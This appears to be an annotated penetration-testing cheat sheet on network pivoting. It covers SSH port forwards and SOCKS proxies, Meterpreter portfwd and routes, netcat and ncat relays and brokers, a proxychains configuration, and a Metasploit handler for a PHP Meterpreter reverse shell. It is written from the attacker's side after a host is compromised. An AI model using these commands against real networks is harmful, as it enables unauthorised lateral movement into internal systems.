# Pivoting: understanding port forwards, SOCKS proxies and relays

<https://n0where.net/how-to-ssh-tunnels-and-stuff>

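# --- Local forward: this host's 127.0.0.1:9001 -> SSH session to 'home' -> yahoo.com:80.
# Browsing to http://localhost:9001/ makes 'home' open the connection to yahoo.com.
# Without an explicit bind address ssh binds the local port to loopback only.
ssh -L 9001:yahoo.com:80 home

# --- Remote (reverse) forward, executed from 'work': 'home' now listens on 9001 and
# relays it back through this session to intra-site.com:80, i.e. a host only 'work'
# can reach. sshd binds the -R port to loopback on 'home' unless GatewayPorts is on,
# so it is usable from 'home' itself, not from the outside.
ssh -R 9001:intra-site.com:80 home

# --- Windows equivalent with plink: expose this host's 127.0.0.1:3306 (MySQL) on
# 111.111.111.111 as port 3307. -pw puts the password in the process list and the
# shell history of the box you run it on; prefer key auth (-i key.ppk) or let plink prompt.
plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306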

Port forwarding with Metasploit. Ports can also be forwarded from a Meterpreter session. Say the compromised machine runs services that are reachable only from inside the network, or only from that machine itself. To reach such a port from the attacker, run this in Meterpreter: `portfwd add -l LOCAL_PORT -p REMOTE_PORT -r REMOTE_HOST` (the angle-bracket placeholders were lost from the original note). The forwarded port is bound on the attacker's machine, so clients are pointed at 127.0.0.1:LOCAL_PORT. Example: `portfwd add -l 3306 -p 3306 -r 192.168.1.222` — the original shows a truncated address (`192.168.222`); REMOTE_HOST is the internal target as seen from the session, as in the next example.

# Meterpreter: bind 3389 on the attacker's machine and relay it through the session
# to 192.168.1.222:3389 (RDP on an internal host). Connect with rdesktop/xfreerdp to 127.0.0.1:3389.
portfwd add -l 3389 -p 3389 -r 192.168.1.222

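# Quick ICMP sweep of a /24 from a compromised host that has no nmap.
# Usage: ping_sweep 10.2.2      -> prints one "bytes from <ip>" line per live host
# Each ping is detached into the background, so output arrives out of order and
# the function returns before all replies are in (same as the original one-liner).
# ICMP is often filtered: no reply does not mean the host is down.
ping_sweep() {
  local prefix
  prefix=${1:?usage: ping_sweep <first-three-octets, e.g. 10.2.2>}
  local i
  for i in {1..254}; do
    ( ping -c 1 "${prefix}.${i}" | grep "bytes from" & )
  done
}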

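# TCP relay with a named pipe: listen on <listen_port> and forward the connection
# to <target_host>:<target_port>. The original note was cut off after "0<backpipe";
# this is the classic full form (the "<" was eaten by the markup).
# Handles one connection and then exits; uses traditional netcat syntax (-l -p) —
# the OpenBSD nc wants "nc -l <port>" instead.
nc_relay() {
  local lport rhost rport fifo
  lport=${1:?usage: nc_relay <listen_port> <target_host> <target_port>}
  rhost=${2:?usage: nc_relay <listen_port> <target_host> <target_port>}
  rport=${3:?usage: nc_relay <listen_port> <target_host> <target_port>}
  # mkfifo refuses to clobber an existing path, so the mktemp -u race is harmless.
  fifo=$(mktemp -u) && mkfifo "$fifo" || return 1
  nc -l -p "$lport" 0<"$fifo" | nc "$rhost" "$rport" 1>"$fifo"
  rm -f -- "$fifo"
}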

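# General form of a local forward through a pivot:
#   local <port> -> SSH session to <pivot_host> -> <destination_host>:<destination_port>
# The destination is resolved and connected from the pivot's point of view.
# (The original used a typographic dash "–L"; ssh only understands "-L".)
ssh -L port:destination_host:destination_port username@pivot_host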

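# Local forward of port 80 to the target's port 80 through the pivot "ip", then point
# the tooling at localhost. Binding port 80 locally needs root; any high port
# (e.g. -L 8080:ip:80) works just as well.
ssh -L 80:ip:80 user@ip

# Scan the forwarded port. nmap is hitting a real local socket here, so any scan
# type works; -sV is what actually matters. Through proxychains/SOCKS instead,
# "-sT -Pn" is mandatory: SYN/UDP scans and ICMP use raw sockets and bypass the tunnel.
# -PN is the old spelling of -Pn (skip host discovery); typographic "–p" is not an option.
nmap -Pn -sT -sV -p 80 localhost

nmap -Pn -sV -p 80 --script=http-methods localhost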

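# Nikto against the target through the forward. -useproxy makes nikto send
# proxy-style (absolute-URI) requests to 127.0.0.1:80, which is not an HTTP proxy
# but the raw forward to the target's web server; it works because HTTP/1.1 servers
# must accept absolute-form request targets. The cleaner form is to target the
# forward directly:  nikto -host 127.0.0.1 -port 80
# (keep -useproxy for a real HTTP proxy, e.g. the ncat one further down).
nikto -host ip -useproxy http://127.0.0.1:80/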

Burp Suite upstream proxy settings: destination host `*`, proxy host 127.0.0.1, proxy port 80, authentication type: none. This points Burp at the local SSH forward, which is a raw TCP forward to the target's web server rather than a real HTTP proxy; it works because HTTP/1.1 servers must accept absolute-form request targets.

Dynamic port forwarding

SSH dynamic port forwarding is set up on the attacker’s system by entering:

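# SOCKS proxy on 127.0.0.1:9150 (any free port will do): every connection a client sends
# to it is made from the pivot "ip". -f backgrounds ssh after authentication, -N opens no shell.
# Bind to 127.0.0.1 as here, not 0.0.0.0, or anyone who can reach your box can use the pivot.
# Only traffic explicitly sent to the SOCKS port is tunnelled; name resolution stays local
# unless the client asks the proxy to resolve (socks5h://, proxychains proxy_dns).
ssh -D 127.0.0.1:9150 -f -N user@ip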

The syntax of the command is `ssh -D address:port -f -N username@pivot_host`.

2.8 Using Ncat for Pivoting

# Ncat as an HTTP (CONNECT) proxy listening on <ip>:8080 on the pivot; clients point
# their proxy setting at it. As written it is unauthenticated and, if <ip> is not
# 127.0.0.1, reachable by anyone on that network: restrict it with --allow <attacker-ip>
# and/or --proxy-auth user:pass.
ncat --listen --proxy-type http ip 8080

# From a Meterpreter session on a Windows host: ARP-scan 7.7.7.0/24 through the
# session to find neighbours without sending traffic from the attacker's own box.
# Set RHOSTS to the subnet the compromised host actually sits on; 7.7.7.0/24 is the example range.
run post/windows/gather/arp\_scanner RHOSTS=7.7.7.0/24

# Start a SOCKS4a server inside msfconsole so external tools (via proxychains) reach
# networks that are only routable through a session; it needs a matching
# "route add <net> <mask> <session>" first. The default SRVHOST is 0.0.0.0:1080 —
# set SRVHOST 127.0.0.1 unless other machines are meant to use it.
# Recent Metasploit folded socks4a/socks5 into auxiliary/server/socks_proxy (option VERSION).
use auxiliary/server/socks4a

\==================================================================================== ssh portforwarding

# Two forwards into the internal host 192.168.63.142 via the pivot "ip":
#   127.0.0.1:10000 -> 192.168.63.142:10000 and 127.0.0.1:4444 -> 192.168.63.142:4444
# The explicit 127.0.0.1 bind keeps the forwarded services off other interfaces.
# Both -L options can also be given to a single ssh session.
ssh -L 127.0.0.1:10000:192.168.63.142:10000 webmaster\@ip

ssh -L 127.0.0.1:4444:192.168.63.142:4444 webmaster\@ip

\====================================================================================

proxychains port forwarding (<https://github.com/haad/proxychains> — proxychains-ng, which provides the `proxychains4` binary used below)

# SOCKS proxy on local port 8888 through the pivot; consumed by proxychains via the
# pivot.conf ProxyList entry "socks4 127.0.0.1 8888". Loopback bind, so only local tools can use it.
ssh -D 127.0.0.1:8888 webmaster\@ip

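# ~/pivot.conf — proxychains configuration for the proxychains4 commands below
# (the original note had all directives collapsed onto one line; one per line is required).
# strict_chain: every proxy in [ProxyList] must be up and is used in order (only one here).
strict_chain
# quiet_mode: no per-connection chain output.
quiet_mode
# proxy_dns: resolve hostnames through the proxy instead of locally, so lookups
# for internal names work and no DNS leaks out of the attacker's box.
proxy_dns
# remote_dns_subnet: fake 224.x.x.x addresses stand in for proxied name lookups.
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
# localnet: connections to loopback bypass the chain.
localnet 127.0.0.0/255.0.0.0

[ProxyList]
# The "ssh -D 127.0.0.1:8888" listener. ssh also speaks SOCKS5, so
# "socks5 127.0.0.1 8888" works as well. No trailing comments on proxy lines:
# the parser reads extra words as user/password.
socks4 127.0.0.1 8888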

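# Run tools through the SOCKS proxy: proxychains LD_PRELOAD-hooks connect(), so every
# TCP connection the program makes goes via the pivot. "ip" is the *internal* target,
# resolved (proxy_dns) and connected from the pivot.
# Limits: statically linked binaries, raw sockets (nmap -sS/-sU, ping) and UDP are not
# proxied — with nmap use "-sT -Pn".
proxychains4 -f ~/pivot.conf /usr/bin/python exploit.py ip 10000

proxychains4 -f ~/pivot.conf ncat -v ip 4444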

\=======================================================================================

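# Build a statically linked ncat from the nmap source tree, to drop on a pivot that
# has no netcat/ncat of its own. (The leading "ncat" label and the trailing note in
# the original line were not part of the command.) Check the result with
# "file ncat/ncat" — it should say "statically linked".
LDFLAGS="-static" ./configure && make ncat_build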

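# --- Connection brokering with ncat: the pivot connects *out* to the attacker, so no
# listener is needed on the pivot and inbound filtering on it does not matter.
# Attacker (192.168.81.125): broker that joins its first two clients to each other.
# Add "--allow <pivot-ip>" so nobody else can take one of the two slots.
ncat -lv --broker -m2 10000
# Pivot: connect to the broker and hand that connection to a second ncat that goes
# to the internal target (-c runs the command with the socket as stdin/stdout).
ncat -v 192.168.81.125 10000 -c "ncat -v 192.168.63.142 10000"
# Attacker: the second broker client; traffic flows attacker -> pivot -> 192.168.63.142:10000.
./exploit.py 127.0.0.1 10000

# Same pattern for port 4444 (e.g. a shell on the internal host).
ncat -lv --broker -m2 4444
ncat -v 192.168.81.125 4444 -c "ncat -v 192.168.63.142 4444"
nc -v 127.0.0.1 4444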

\============================================================================= metasploit

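# Handler for a PHP Meterpreter callback on ip:9999. msfcli has long been removed
# from Metasploit; the equivalent with msfconsole is:
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD php/meterpreter_reverse_tcp; set LHOST ip; set LPORT 9999; run"
# Original (legacy msfcli) form, kept for reference:
# msfcli exploit/multi/handler PAYLOAD=php/meterpreter_reverse_tcp LHOST=ip LPORT=9999 E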

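# Inside msfconsole, once the handler holds a session (id 1): add a route so that
# modules — and the socks4a server above — reach the session host's internal network.
# "ip" is the *network* address of that subnet (e.g. 192.168.63.0), not a host.
# "route print" shows the table; post/multi/manage/autoroute adds routes automatically.
route add ip 255.255.255.0 1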

<https://blog.techorganic.com/2012/10/10/introduction-to-pivoting-part-2-proxychains/>
